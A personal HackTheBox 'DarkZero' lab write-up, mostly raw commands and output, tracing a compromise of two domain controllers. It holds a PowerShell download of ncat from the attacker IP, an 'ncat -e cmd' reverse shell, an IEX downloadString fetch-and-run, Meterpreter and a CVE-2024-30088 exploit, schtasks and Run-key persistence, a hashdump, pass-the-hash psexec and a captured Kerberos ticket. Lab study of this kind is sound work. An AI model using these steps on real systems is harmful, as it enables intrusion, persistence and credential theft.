Here is my note on DARKZERO box from Hackthebox.
DARKZERO: 10.10.11.89
As is common in real life pentests, you will start the DarkZero box with credentials for the following account john.w / RFulUtONCOL!
john.w:RFulUtONCOL!
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
bloodhound-python -c All -u john.w -p RFulUtONCOL! -d darkzero.htb --dns-tcp -ns 10.10.11.89
faketime -f $(ntpdate -q darkzero.htb | awk '{print $4}') bash
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-16 01:09:22Z)
sudo GetUserSPNs.py darkzero.htb/john.w:'RFulUtONCOL!' -dc-ip 10.10.11.89 -request -save -outputfile GetUserSPNs.out
No entries Found !
sudo GetNPUsers.py -k -dc-ip 10.10.11.89 darkzero.htb/ -usersfile users.txt
#NOPE.
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO/Timeroast]
└─# python3 timeroast.py 10.10.11.89
2602:$sntp-ms$66f372caa765d57cb7c1eb054119ed40$1c0111e900000000000a92334c4f434cecc2f892ef77fae3e1b8428bffbfcd0aecc3b951df98a14cecc3b951df98ce98
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO/Timeroast]
└─# ls
extra-scripts LICENSE README.md timeroast.ps1 timeroast.py
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO/Timeroast]
└─# cd ..
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO]
└─# ls
10.10.11.89 BLOOD ldap-people pre2k SYSVOL Timeroast timeroasting.py usernames users.txt
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO]
└─# sudo leafpad time-hash.txt
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO]
└─# python3 timeroasting.py time-hash.txt /usr/share/seclists/Passwords/darkweb2017-top10000.txt
0 passwords recovered.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
ldapsearch -H ldap://10.10.11.89 -x -W -D "john.w@darkzero.htb" -b "dc=zero,dc=htb" '(objectClass=person)' > ldap-people
445/tcp open microsoft-ds?
crackmapexec smb 10.10.11.89 -u 'john.w' -p 'RFulUtONCOL!'
crackmapexec smb 10.10.11.89 -u 'john.w' -p 'RFulUtONCOL!' --shares
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO/BLOOD]
└─# crackmapexec smb 10.10.11.89 -u 'john.w' -p 'RFulUtONCOL!' --shares
SMB 10.10.11.89 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.89 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
SMB 10.10.11.89 445 DC01 [+] Enumerated shares
SMB 10.10.11.89 445 DC01 Share Permissions Remark
SMB 10.10.11.89 445 DC01 ----- ----------- ------
SMB 10.10.11.89 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.89 445 DC01 C$ Default share
SMB 10.10.11.89 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.89 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.89 445 DC01 SYSVOL READ Logon server share
nxc ldap 10.10.11.89 -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 --bloodhound --collection All
nxc ldap dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 --bloodhound --collection All
faketime -f $(ntpdate -q darkzero.htb | awk '{print $4}') bash
nxc ldap dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 --bloodhound --collection All #WORKS !
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO/BLOOD]
└─# nxc ldap dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 --bloodhound --collection All
SMB dc01.darkzero.htb 445 DC01 [*] Windows 10.0 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
LDAPS dc01.darkzero.htb 636 DC01 [+] darkzero.htb\john.w
LDAPS dc01.darkzero.htb 636 DC01 Resolved collection methods: trusts, container, localadmin, acl, objectprops, group, psremote, dcom, rdp, session
LDAPS dc01.darkzero.htb 636 DC01 Using kerberos auth without ccache, getting TGT
LDAP dc01.darkzero.htb 389 DC01 Done in 00M 25S
LDAPS dc01.darkzero.htb 636 DC01 Compressing output into /root/.nxc/logs/DC01_dc01.darkzero.htb_2025-11-15_204215_bloodhound.zip
nxc ldap dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 -M maq
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO/BLOOD]
└─# nxc ldap dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 -M maq
SMB dc01.darkzero.htb 445 DC01 [*] Windows 10.0 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
LDAPS dc01.darkzero.htb 636 DC01 [+] darkzero.htb\john.w
MAQ dc01.darkzero.htb 389 DC01 [*] Getting the MachineAccountQuota
MAQ dc01.darkzero.htb 389 DC01 MachineAccountQuota: 10
Able to create a computer objects or workstation = MachineAccountQuota: 10
nxc smb dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 -M webdav
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO/BLOOD]
└─# nxc smb dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 -M webdav
SMB dc01.darkzero.htb 445 DC01 [*] Windows 10.0 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB dc01.darkzero.htb 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
#NOTHING.
nxc ldap dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 -M ldap-checker
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO/BLOOD]
└─# nxc ldap dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 -M ldap-checker
SMB dc01.darkzero.htb 445 DC01 [*] Windows 10.0 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
LDAPS dc01.darkzero.htb 636 DC01 [+] darkzero.htb\john.w
LDAP-CHE... dc01.darkzero.htb 389 DC01 [-] 111 is not a valid PaDataType
LDAP-CHE... dc01.darkzero.htb 389 DC01 [-] Connection fail, exiting now
#NOPE.
nxc ldap dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --dns-tcp --dns-server 10.10.11.89 --kerberoasting output.txt
smbclient.py darkzero.htb/john.w:'RFulUtONCOL!'@10.10.11.89
sudo lookupsid.py john.w@10.10.11.89 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO]
└─# cat users.txt
Administrator
Guest
krbtgt
DC01$
darkzero-ext$
john.w
nxc ldap 10.10.11.89 -k -u users.txt -p '' --asreproast output.txt
nxc ldap dc01.darkzero.htb -k -u john.w -p 'RFulUtONCOL!' --users
poetry run pre2k auth -u john.w -p 'RFulUtONCOL!' -d darkzero.htb -dc-ip 10.10.11.89 -verbose
poetry run pre2k unauth -d darkzero.htb -dc-ip 10.10.11.89 -inputfile computers.txt
#NOPE.
#FROM MSSQL SERVICE:
Administrator:5917507bdf2ef2c2b0a869a1cba40726
nxc smb dc01.darkzero.htb -u Administrator -H '5917507bdf2ef2c2b0a869a1cba40726'
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO]
└─# psexec.py -hashes :5917507bdf2ef2c2b0a869a1cba40726 administrator@dc01.darkzero.htb
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc01.darkzero.htb.....
[*] Found writable share ADMIN$
[*] Uploading file UhJiuYnW.exe
[*] Opening SVCManager on dc01.darkzero.htb.....
[*] Creating service enzK on dc01.darkzero.htb.....
[*] Starting service enzK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.26100.4652]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\System32> whoami
nt authority\system
C:\Windows\System32> hostname
DC01
ADMINISTRATOR SHELL !
C:\Users\Administrator\Desktop> whoami
nt authority\system
C:\Users\Administrator\Desktop> hostname
DC01
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is EF7E-D912
Directory of C:\Users\Administrator\Desktop
07/31/2025 02:21 PM <DIR> .
03/23/2025 07:38 PM <DIR> ..
11/17/2025 03:02 AM 34 root.txt
11/17/2025 03:02 AM 34 user.txt
2 File(s) 68 bytes
2 Dir(s) 6,256,390,144 bytes free
C:\Users\Administrator\Desktop> type user.txt
[REDIRECTED]
C:\Users\Administrator\Desktop> type root.txt
[REDIRECTED]
USER.TXT: [REDIRECTED]
ROOT.TXT: [REDIRECTED]
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
1433/tcp open ms-sql-s Microsoft SQL Server
|_tls-ticketbleed: ERROR: Script execution failed (use -d to debug)
mssqlclient.py john.w:'RFulUtONCOL!'@10.10.11.89
mssqlclient.py john.w:'RFulUtONCOL!'@10.10.11.89 -windows-auth
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO]
└─# mssqlclient.py john.w:'RFulUtONCOL!'@10.10.11.89 -windows-auth
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (darkzero\john.w guest@master)> enable_xp_cmdshell
ERROR(DC01): Line 105: User does not have permission to perform this action.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(DC01): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (darkzero\john.w guest@master)> SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
name
----
#EMPTY.
xp_dirtree \\10.10.14.148\test
SQL (darkzero\john.w guest@master)> enum_links;
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
----------------- ---------------- ----------- ----------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
DC02.darkzero.ext SQLNCLI SQL Server DC02.darkzero.ext NULL NULL NULL
Linked Server Local Login Is Self Mapping Remote Login
----------------- --------------- --------------- ------------
DC02.darkzero.ext darkzero\john.w 0 dc01_sql_svc
Responder:
sudo responder -I tun0
[SMB] NTLMv2-SSP Client : 10.10.11.89
[SMB] NTLMv2-SSP Username : darkzero\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::darkzero:64f1c1f987b5a68b:546EA2F61CB5E2C993093274774CB5BF:010100000000000080C0B7253F56DC01D20F754D21E4D88D0000000002000800560042003300490001001E00570049004E002D00450057004F004C004B0047004900590033004E005A0004003400570049004E002D00450057004F004C004B0047004900590033004E005A002E0056004200330049002E004C004F00430041004C000300140056004200330049002E004C004F00430041004C000500140056004200330049002E004C004F00430041004C000700080080C0B7253F56DC01060004000200000008003000300000000000000000000000003000005F60A206B7B3162B40A6E8724FB2729269BDF2DEBF6367A96E6D66692EB4D40A0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340038000000000000000000
#NOPE
SQL (darkzero\john.w guest@master)> enum_links;
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
----------------- ---------------- ----------- ----------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
DC02.darkzero.ext SQLNCLI SQL Server DC02.darkzero.ext NULL NULL NULL
Linked Server Local Login Is Self Mapping Remote Login
----------------- --------------- --------------- ------------
DC02.darkzero.ext darkzero\john.w 0 dc01_sql_svc
SQL (darkzero\john.w guest@master)> enum_db
name is_trustworthy_on
------ -----------------
master 0
tempdb 0
model 0
msdb 1
SQL (darkzero\john.w guest@master)> use_link "DC02.darkzero.ext"
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> enable_xp_cmdshell
INFO(DC02): Line 196: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC02): Line 196: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> xp_cmdshell "whoami"
output
--------------------
darkzero-ext\svc_sql
NULL
RCE-ACHIEVED on darkzero-ext target !
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> xp_cmdshell "whoami"
output
--------------------
darkzero-ext\svc_sql
NULL
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> xp_cmdshell "hostname"
output
------
DC02
NULL
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> xp_cmdshell "ipconfig /all"
output
------------------------------------------------------------------------
NULL
Windows IP Configuration
NULL
Host Name . . . . . . . . . . . . : DC02
Primary Dns Suffix . . . . . . . : darkzero.ext
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : darkzero.ext
NULL
Ethernet adapter Ethernet:
NULL
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft Hyper-V Network Adapter
Physical Address. . . . . . . . . : 00-15-5D-F2-5C-01
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 172.16.20.2(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.20.1
DNS Servers . . . . . . . . . . . : 127.0.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled
NULL
Turn it into a shell with netcat if you can.
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> xp_cmdshell "powershell.exe -c wget http://10.10.14.148/ncat.exe -O C:\Users\svc_sql\ncat.exe"
output
------
NULL
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> xp_cmdshell "C:\users\svc_sql\ncat.exe -nv 10.10.14.148 1234 -e cmd"
┌──(root㉿kali)-[/home/kali/BOXES/DARKZERO]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.148] from (UNKNOWN) [10.10.11.89] 52938
Microsoft Windows [Version 10.0.20348.2113]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
darkzero-ext\svc_sql
C:\Windows\system32>hostname
hostname
DC02
Turn it into a meterpreter as usual.
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.148:4444
[*] Sending stage (200774 bytes) to 10.10.11.89
[*] Meterpreter session 1 opened (10.10.14.148:4444 -> 10.10.11.89:52977) at 2025-11-15 15:08:13 -0500
PRIV ESC:
CVE-2024-30088 PRIV ESC NOTES: #DARKZERO-HTB
It's vulnerable to CVE-2024-30088.
Run a different session with this exploit otherwise it will not work with the same session.
powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.148/adPEAS.ps1')
The sessions keep dying when you use CVE-2024-30088 with the same session but it will works with different session for some reason.
Meterpreter Persistence:
schtasks /create /tn "Updater" /tr "C:\Users\Public\shell.exe" /sc minute /mo 5 /ru SYSTEM
execute -f cmd.exe -a '/c schtasks /create /tn "Updater" /tr "C:\Users\Public\shell.exe" /sc minute /mo 5 /ru SYSTEM' #WITHIN METERPRETER
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v updater /t REG_SZ /d "C:\Users\Public\shell.exe"
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
3 meterpreter x64/windows darkzero-ext\svc_sql @ DC02 10.10.14.148:5555 -> 10.10.11.89:59470 (172.16.20.2)
4 meterpreter x64/windows darkzero-ext\svc_sql @ DC02 10.10.14.148:5555 -> 10.10.11.89:59478 (172.16.20.2)
msf exploit(windows/local/cve_2024_30088_authz_basep) > set SESSION 4
SESSION => 4
msf exploit(windows/local/cve_2024_30088_authz_basep) > run
[*] Started reverse TCP handler on 10.10.14.148:1234
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[*] Reflectively injecting the DLL into 1020...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 860
[+] Successfully retrieved winlogon pid: 600
[*] Sending stage (230982 bytes) to 10.10.11.89
[*] Meterpreter session 5 opened (10.10.14.148:1234 -> 10.10.11.89:59481) at 2025-11-16 16:46:42 -0500
meterpreter > shell
Process 1796 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.2113]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>hostname
hostname
DC02
SYSTEM-SHELL of DC02.darkzero-ext.
C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>hostname
hostname
DC02
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is E415-87AD
Directory of C:\Users\Administrator\Desktop
11/16/2025 08:21 PM <DIR> .
09/29/2025 10:14 AM <DIR> ..
11/16/2025 08:26 PM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 3,344,351,232 bytes free
C:\Users\Administrator\Desktop>type user.txt
type user.txt
[REDIRECTED]
USER.TXT: [REDIRECTED]
POST-EXPLOITATION:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6963aad8ba1150192f3ca6341355eb49:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:43e27ea2be22babce4fbcff3bc409a9d:::
svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:816ccb849956b531db139346751db65f:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:663a13eb19800202721db4225eadc38e:::
darkzero$:1105:aad3b435b51404eeaad3b435b51404ee:ced37d583d9539558f1068689780bd1f:::
Cross-Forest Attack with TGTDelegation (AbuseTGTDelegation):
adPEAS:
[?] +++++ Checking Forest and Domain Trusts +++++
[+] Found configured forest trusts of 'darkzero.ext':
Target Forest Name: darkzero.htb
TrustDirection: Bidirectional
TopLevelNames: System.DirectoryServices.ActiveDirectory.TopLevelName
TrustedDomainInformation: System.DirectoryServices.ActiveDirectory.ForestTrustDomainInformation
[+] Found configured domain trusts of 'darkzero.ext':
Target Domain Name: darkzero.htb
Target Domain SID: S-1-5-21-1152179935-589108180-1989892463
Flags: DIRECT_OUTBOUND, DIRECT_INBOUND
TrustAttributes: FOREST_TRANSITIVE
netdom query /domain:darkzero.htb trust
PS C:\Users\svc_sql> netdom query /domain:darkzero.htb trust
netdom query /domain:darkzero.htb trust
Direction Trusted\Trusting domain Trust type
========= ======================= ==========
<-> darkzero.ext
Direct
The command completed successfully.
PS C:\Users\svc_sql> Import-Module ActiveDirectory
Import-Module ActiveDirectory
PS C:\Users\svc_sql> Get-ADTrust -Filter *
Get-ADTrust darkzero.htb -Server darkzero.ext | Select Name, Direction, TrustAttributes, TGTDelegation
PS C:\Users\svc_sql> Get-ADTrust darkzero.htb -Server darkzero.ext | Select Name, Direction, TrustAttributes, TGTDelegation
Get-ADTrust darkzero.htb -Server darkzero.ext | Select Name, Direction, TrustAttributes, TGTDelegation
Name Direction TrustAttributes TGTDelegation
---- --------- --------------- -------------
darkzero.htb BiDirectional 8 False
Get-ADTrust darkzero.ext -Server darkzero.htb | Select Name, Direction, TrustAttributes, TGTDelegation
PS C:\Users\svc_sql> Get-ADTrust darkzero.ext -Server darkzero.htb | Select Name, Direction, TrustAttributes, TGTDelegation
Get-ADTrust darkzero.ext -Server darkzero.htb | Select Name, Direction, TrustAttributes, TGTDelegation
Name Direction TrustAttributes TGTDelegation
---- --------- --------------- -------------
darkzero.ext BiDirectional 2056 True
darkzero.htb -> TGTDelegation = False -> darkzero.ext
darkzero.ext -> TGTDelegation = True -> darkzero.htb
Rubeus.exe request monitor /interval:5 /nowrap #Don't Work
Rubeus.exe monitor /interval:5 /nowrap
SpoolSample.exe DC01.darkzero.htb DC02.darkzero.ext
Going back to MSSQL Service:
EXEC xp_dirtree '\\DC02.darkzero.ext\share'
Check back Rubeus request monitor again:
[*] 11/18/2025 12:20:10 AM UTC - Found new TGT:
User : DC01$@DARKZERO.HTB
StartTime : 11/17/2025 4:20:05 PM
EndTime : 11/18/2025 2:20:05 AM
RenewTill : 11/24/2025 4:20:05 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
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
